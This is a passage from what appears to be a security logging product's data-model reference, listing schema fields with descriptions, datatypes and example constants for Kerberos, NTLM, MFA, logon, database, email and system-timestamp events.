Description The client principal type.

Datatype XDM_CONST.KERBEROS_PRINCIPAL_TYPE

Dataclass Scalar

Examples XDM_CONST.KERBEROS_PRINCIPAL_TYPE_UNKNOWN, XDM_CONST.KERBEROS_PRINCIPAL_TYPE_PRINCIPAL, XDM_CONST.KERBEROS_PRINCIPAL_TYPE_SRV_INST, XDM_CONST.KERBEROS_PRINCIPAL_TYPE_SRV_HST, XDM_CONST.KERBEROS_PRINCIPAL_TYPE_SRV_XHST

xdm.auth.kerberos_tgt.cname_values

Description The client principal names being requested.

Datatype String

Dataclass Array

xdm.auth.kerberos_tgt.kdc_options

Description The key distribution center options.

Datatype XDM_CONST.KERBEROS_KDC_OPTION

Dataclass Scalar

Examples XDM_CONST.KERBEROS_KDC_OPTION_RESERVED, XDM_CONST.KERBEROS_KDC_OPTION_FORWARDABLE, XDM_CONST.KERBEROS_KDC_OPTION_FORWARDED, XDM_CONST.KERBEROS_KDC_OPTION_PROXIABLE, XDM_CONST.KERBEROS_KDC_OPTION_PROXY

xdm.auth.kerberos_tgt.ticket_expiration

Description The time remaining until the ticket expires in seconds.

Datatype Number

Dataclass Scalar

xdm.auth.kerberos_tgt.renew_ticket_expiration

Description The time remaining until the ticket renewal expires in seconds.

Datatype Number

Dataclass Scalar

xdm.auth.kerberos_tgt.encryption_type

Description The encryption type.

Datatype XDM_CONST.KERBEROS_ENCRYPTION_TYPE

Dataclass Scalar

Examples XDM_CONST.KERBEROS_ENCRYPTION_TYPE_DES_CBC_CRC, XDM_CONST.KERBEROS_ENCRYPTION_TYPE_DES_CBC_MD4, XDM_CONST.KERBEROS_ENCRYPTION_TYPE_DES_CBC_MD5, XDM_CONST.KERBEROS_ENCRYPTION_TYPE_DES_CBC_RAW,

XDM_CONST.KERBEROS_ENCRYPTION_TYPE_DES3_CBC_MD5

xdm.auth.kerberos_tgt.padata_type

Description Pre-authentication data types.

Datatype XDM_CONST.KERBEROS_PA_TYPE

Dataclass Scalar

Examples XDM_CONST.KERBEROS_PA_TYPE_TGS_REQ, XDM_CONST.KERBEROS_PA_TYPE_ENC_TIMESTAMP, XDM_CONST.KERBEROS_PA_TYPE_PW_SALT, XDM_CONST.KERBEROS_PA_TYPE_ENC_UNIX_TIME, XDM_CONST.KERBEROS_PA_TYPE_SANDIA_SECUREID

xdm.auth.kerberos_tgt.padata_prefix

Description Pre-authentication data that contains a PA-PAC-REQUEST structure.

Datatype String

Dataclass Scalar

xdm.auth.kerberos_tgt.ticket_prefix

Description The prefix of the service principal's ticket.

Datatype String

Dataclass Scalar
xdm.auth.kerberos_tgt.error_code

Description Kerberos error code.

Datatype XDM_CONST.KERBEROS_ERROR_CODE

Dataclass Scalar

Examples XDM_CONST.KERBEROS_ERROR_CODE_ERR_KDC_NONE, XDM_CONST.KERBEROS_ERROR_CODE_ERR_KDC_NAME_EXP, XDM_CONST.KERBEROS_ERROR_CODE_ERR_KDC_SERVICE_EXP, XDM_CONST.KERBEROS_ERROR_CODE_ERR_KDC_BAD_PVNO,

XDM_CONST.KERBEROS_ERROR_CODE_ERR_KDC_C_OLD_MAST_KVNO

xdm.auth.kerberos_tgs

Kerberos protocol specific fields.

xdm.auth.kerberos_tgs.msg_type

Description Kerberos 5 message type assigned numbers.

Datatype XDM_CONST.KERBEROS_MSG_TYPE

Dataclass Scalar

Examples XDM_CONST.KERBEROS_MSG_TYPE_AS_REQ, XDM_CONST.KERBEROS_MSG_TYPE_AS_REP, XDM_CONST.KERBEROS_MSG_TYPE_TGS_REQ, XDM_CONST.KERBEROS_MSG_TYPE_TGS_REP, XDM_CONST.KERBEROS_MSG_TYPE_AP_REQ

xdm.auth.kerberos_tgs.spn_type

Description The type of the requested service principal.

Datatype XDM_CONST.KERBEROS_PRINCIPAL_TYPE

Dataclass Scalar

Examples XDM_CONST.KERBEROS_PRINCIPAL_TYPE_UNKNOWN, XDM_CONST.KERBEROS_PRINCIPAL_TYPE_PRINCIPAL, XDM_CONST.KERBEROS_PRINCIPAL_TYPE_SRV_INST, XDM_CONST.KERBEROS_PRINCIPAL_TYPE_SRV_HST, XDM_CONST.KERBEROS_PRINCIPAL_TYPE_SRV_XHST

xdm.auth.kerberos_tgs.spn_values

Description The service names being requested.

Datatype String

Dataclass Array

xdm.auth.kerberos_tgs.cname_type

Description The client principal type.

Datatype XDM_CONST.KERBEROS_PRINCIPAL_TYPE

Dataclass Scalar

Examples XDM_CONST.KERBEROS_PRINCIPAL_TYPE_UNKNOWN, XDM_CONST.KERBEROS_PRINCIPAL_TYPE_PRINCIPAL, XDM_CONST.KERBEROS_PRINCIPAL_TYPE_SRV_INST, XDM_CONST.KERBEROS_PRINCIPAL_TYPE_SRV_HST, XDM_CONST.KERBEROS_PRINCIPAL_TYPE_SRV_XHST

xdm.auth.kerberos_tgs.cname_values

Description The client principal names being requested.

Datatype String

Dataclass Array

xdm.auth.kerberos_tgs.kdc_options

Description The key distribution center options.

Datatype XDM_CONST.KERBEROS_KDC_OPTION

Dataclass Scalar

Examples XDM_CONST.KERBEROS_KDC_OPTION_RESERVED, XDM_CONST.KERBEROS_KDC_OPTION_FORWARDABLE, XDM_CONST.KERBEROS_KDC_OPTION_FORWARDED, XDM_CONST.KERBEROS_KDC_OPTION_PROXIABLE, XDM_CONST.KERBEROS_KDC_OPTION_PROXY

xdm.auth.kerberos_tgs.ticket_expiration

Description The time remaining until the ticket expires in seconds.

Datatype Number

Dataclass Scalar

xdm.auth.kerberos_tgs.renew_ticket_expiration

Description The time remaining until the ticket renewal expires in seconds.

Datatype Number

Dataclass Scalar

xdm.auth.kerberos_tgs.encryption_type
 Description The encryption type.

Datatype XDM_CONST.KERBEROS_ENCRYPTION_TYPE

Dataclass Scalar

Examples XDM_CONST.KERBEROS_ENCRYPTION_TYPE_DES_CBC_CRC, XDM_CONST.KERBEROS_ENCRYPTION_TYPE_DES_CBC_MD4, XDM_CONST.KERBEROS_ENCRYPTION_TYPE_DES_CBC_MD5, XDM_CONST.KERBEROS_ENCRYPTION_TYPE_DES_CBC_RAW,

XDM_CONST.KERBEROS_ENCRYPTION_TYPE_DES3_CBC_MD5

xdm.auth.kerberos_tgs.padata_type

Description Pre-authentication data types.

Datatype XDM_CONST.KERBEROS_PA_TYPE

Dataclass Scalar

Examples XDM_CONST.KERBEROS_PA_TYPE_TGS_REQ, XDM_CONST.KERBEROS_PA_TYPE_ENC_TIMESTAMP, XDM_CONST.KERBEROS_PA_TYPE_PW_SALT, XDM_CONST.KERBEROS_PA_TYPE_ENC_UNIX_TIME, XDM_CONST.KERBEROS_PA_TYPE_SANDIA_SECUREID

xdm.auth.kerberos_tgs.padata_prefix

Description Pre-authentication data that contains a PA-PAC-REQUEST structure.

Datatype String

Dataclass Scalar

xdm.auth.kerberos_tgs.ticket_prefix

Description The prefix of the service principal's ticket.

Datatype String

Dataclass Scalar

xdm.auth.kerberos_tgs.error_code

Description Kerberos error code.

Datatype XDM_CONST.KERBEROS_ERROR_CODE

Dataclass Scalar

Examples XDM_CONST.KERBEROS_ERROR_CODE_ERR_KDC_NONE, XDM_CONST.KERBEROS_ERROR_CODE_ERR_KDC_NAME_EXP, XDM_CONST.KERBEROS_ERROR_CODE_ERR_KDC_SERVICE_EXP, XDM_CONST.KERBEROS_ERROR_CODE_ERR_KDC_BAD_PVNO,

XDM_CONST.KERBEROS_ERROR_CODE_ERR_KDC_C_OLD_MAST_KVNO

xdm.auth.ntlm

NTLM (New Technology LAN Manager) protocol specific fields.

xdm.auth.ntlm.version

Description The NTLM protocol version.

Datatype String

Dataclass Scalar

xdm.auth.ntlm.user_name

Description The user name provided by the client.

Datatype String

Dataclass Scalar

xdm.auth.ntlm.hostname

Description The host name provided by the client.

Datatype String

Dataclass Scalar

xdm.auth.ntlm.target

Description The NTLM target provided by the server.

Datatype String

Dataclass Scalar

xdm.auth.ntlm.domain

Description The domain name provided by the server.

Datatype String
 Dataclass Scalar

xdm.auth.ntlm.dns_domain

Description The DNS domain name provided by the server.

Datatype String

Dataclass Scalar

xdm.auth.ntlm.dns_hostname

Description The DNS host name name provided by the server.

Datatype String

Dataclass Scalar

xdm.auth.ntlm.dns_three

Description The DNS three provided by the server.

Datatype String

Dataclass Scalar

xdm.auth.ntlm.challenge

Description The NTLM challenge.

Datatype String

Dataclass Scalar

xdm.auth.ntlm.ntproof

Description The proof that the client provided, encoded as Base64.

Datatype String

Dataclass Scalar

xdm.auth.is_mfa_needed

Description Whether multi-factor authentication was needed in this authentication attempt.

Datatype Boolean

Dataclass Scalar

xdm.auth.mfa

Details about the multi-factor authentication attempt.

xdm.auth.mfa.method

Description The method being used by the multi-factor authentication provider.

Datatype String

Dataclass Scalar

xdm.auth.mfa.provider

Description The multi-factor authentication provider.

Datatype String

Dataclass Scalar

xdm.auth.mfa.client_details

Description Additional information about the client, as reported by the the multi-factor authentication provider.

Datatype String

Dataclass Scalar

5.10 | xdm.logon
Fields related to a logon attempt.

xdm.logon.type

Description A numeric value that indicates the type of logon session. See https://docs.microsoft.com/en-us/windows/win32/cimwin32prov/win32-logonsession.

Datatype XDM_CONST.LOGON_TYPE
 Dataclass Scalar

Examples XDM_CONST.LOGON_TYPE_INTERACTIVE, XDM_CONST.LOGON_TYPE_NETWORK, XDM_CONST.LOGON_TYPE_BATCH, XDM_CONST.LOGON_TYPE_SERVICE, XDM_CONST.LOGON_TYPE_PROXY

xdm.logon.assigned_rights

Description A list of assigned user rights. See https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/user-rights-assignment.

Datatype XDM_CONST.LOGON_ASSIGNED_RIGHT

Dataclass Array

Examples XDM_CONST.LOGON_ASSIGNED_RIGHT_SE_TRUSTED_CRED_MAN_ACCESS_PRIVILEGE, XDM_CONST.LOGON_ASSIGNED_RIGHT_SE_NETWORK_LOGON_RIGHT, XDM_CONST.LOGON_ASSIGNED_RIGHT_SE_TCB_PRIVILEGE,

XDM_CONST.LOGON_ASSIGNED_RIGHT_SE_MACHINE_ACCOUNT_PRIVILEGE, XDM_CONST.LOGON_ASSIGNED_RIGHT_SE_INCREASE_QUOTA_PRIVILEGE

xdm.logon.logon_guid

Description The GUID of the logon request.

Datatype String

Dataclass Scalar

xdm.logon.is_elevated

Description Whether the logon is elevated and has administrator privileges.

Datatype Boolean

Dataclass Scalar

xdm.logon.is_virtual_account

Description Whether the logon account is a virtual account.

Datatype Boolean

Dataclass Scalar

xdm.logon.is_restricted_admin_mode

Description Only populated for RemoteInteractive logon type sessions. Indicates whether the credentials provided were passed using Restricted Admin mode.

Datatype Boolean

Dataclass Scalar

xdm.logon.impersonation_level

Description Impersonation is the ability of a thread to execute in a security context that is different from the context of the process that owns the thread. When running in the client's security context, the server 'is' the client, to some degree. See https://docs.microsoft.com/en-us/windows/win32/com/impersonation-levels

Datatype XDM_CONST.LOGON_IMPERSONATION_LEVEL

Dataclass Scalar

Examples XDM_CONST.LOGON_IMPERSONATION_LEVEL_ANONYMOUS, XDM_CONST.LOGON_IMPERSONATION_LEVEL_IDENTIFICATION, XDM_CONST.LOGON_IMPERSONATION_LEVEL_IMPERSONATION, XDM_CONST.LOGON_IMPERSONATION_LEVEL_DELEGATION

xdm.logon.package_name

Description The authentication package used.

Datatype String

Dataclass Scalar

xdm.logon.fingerprint

Description The authentication fingerprint.

Datatype String

Dataclass Scalar

5.11 | xdm.database
A database action such as query/update/alter.

xdm.database.connection_id

Description The ID of the connection to the database server.

Datatype String

Dataclass Scalar

xdm.database.connection_flags
 Description The flags regarding the client connection to the database server.

Datatype String

Dataclass Scalar

xdm.database.operation

Description The database operation name.

Datatype XDM_CONST.DB_OPERATION

Dataclass Scalar

Examples XDM_CONST.DB_OPERATION_QUERY, XDM_CONST.DB_OPERATION_UPDATE, XDM_CONST.DB_OPERATION_CREATE, XDM_CONST.DB_OPERATION_DELETE, XDM_CONST.DB_OPERATION_ALTER

xdm.database.name

Description The database name.

Datatype String

Dataclass Scalar

xdm.database.schema

Description The schema context in which the action occurred.

Datatype String

Dataclass Scalar

xdm.database.tables

Description The names of the tables used in the query.

Datatype String

Dataclass Array

xdm.database.statement

Description The actual query.

Datatype String

Dataclass Scalar

xdm.database.affected_rows

Description The number of rows affected by the query.

Datatype Number

Dataclass Scalar

xdm.database.response_time

Description The operation runtime in seconds.

Datatype Number

Dataclass Scalar

5.12 | xdm.email
Email fields.

xdm.email.recipients

Description A list of the recipients' addresses.

Datatype EmailAddress

Dataclass Array

xdm.email.attachment

the email attachment

xdm.email.attachment.filename

Description The file name of the email attachment.

Datatype String

Dataclass Scalar
xdm.email.attachment.path

Description The file path of the email attachment.

Datatype String

Dataclass Scalar

xdm.email.attachment.directory

Description The file directory of the email attachment.

Datatype String

Dataclass Scalar

xdm.email.attachment.extension

Description The file extension of the email attachment.

Datatype String

Dataclass Scalar

xdm.email.attachment.file_type

Description The file type of the email attachment.

Datatype String

Dataclass Scalar

xdm.email.attachment.md5

Description The MD5 hash signature for the email attachment content.

Datatype MD5

Dataclass Scalar

xdm.email.attachment.sha256

Description The SHA256 hash signature for the email attachment content.

Datatype SHA256

Dataclass Scalar

xdm.email.attachment.is_signed

Description Whether the loaded module of the email attachment is signed.

Datatype Boolean

Dataclass Scalar

Examples True

xdm.email.attachment.signer

Description The signer of the email attachment.

Datatype String

Dataclass Scalar

Examples Microsoft Corporation

xdm.email.attachment.signature_status

Description The signature status of the email attachment.

Datatype XDM_CONST.SIGNATURE_STATUS

Dataclass Scalar

Examples XDM_CONST.SIGNATURE_STATUS_UNSIGNED, XDM_CONST.SIGNATURE_STATUS_SIGNED_INVALID, XDM_CONST.SIGNATURE_STATUS_SIGNED_VERIFIED, XDM_CONST.SIGNATURE_STATUS_STATUS_UNKNOWN

xdm.email.attachment.size

Description Size in bytes of the email attachment.

Datatype Number

Dataclass Scalar

xdm.email.subject
 Description The subject line of the email.

Datatype String

Dataclass Scalar

xdm.email.cc

Description A list of 'cc' addresses.

Datatype EmailAddress

Dataclass Array

xdm.email.bcc

Description A list of 'bcc' addresses.

Datatype EmailAddress

Dataclass Array

xdm.email.sender

Description The sender address.

Datatype EmailAddress

Dataclass Scalar

xdm.email.data

Description The actual message sent, encoded in UTF-8.

Datatype String

Dataclass Scalar

xdm.email.mime

Description Information about how the message is to be displayed.

Datatype String

Dataclass Scalar

xdm.email.return_path

Description The header that indicates where and how bounced emails will be processed.

Datatype String

Dataclass Scalar

xdm.email.message_id

Description An identifier of the email, as generated by the sending mail system.

Datatype String

Dataclass Scalar

xdm.email.delivery_timestamp

Description The time that the email was delivered.

Datatype Timestamp

Dataclass Scalar

xdm.email.origination_timestamp

Description The time that the email was sent.

Datatype Timestamp

Dataclass Scalar

6 | XDM System Fields

6.1 | _insert_time
The timestamp when the event was ingested into the system. [System Field]

Description The timestamp when the event was ingested into the system. [System Field]
 Datatype Timestamp

Dataclass Scalar

6.2 | _time
The event timestamp [System Field]

Description The event timestamp [System Field]

Datatype Timestamp

Dataclass Scalar

6.3 | _vendor
The vendor of the observing device/agent. May be defined only in Parsing Rules [System Field]

Description The vendor of the observing device/agent. May be defined only in Parsing Rules [System Field]

Datatype String

Dataclass Scalar

6.4 | _product
The product name of the observing device/agent. May be defined only in Parsing Rules [System Field]

Description The product name of the observing device/agent. May be defined only in Parsing Rules [System Field]

Datatype String

Dataclass Scalar

6.5 | _reception_time
The Unix timestamp when the event was received by the system. [System Field]

Description The Unix timestamp when the event was received by the system. [System Field]

Datatype Number

Dataclass Scalar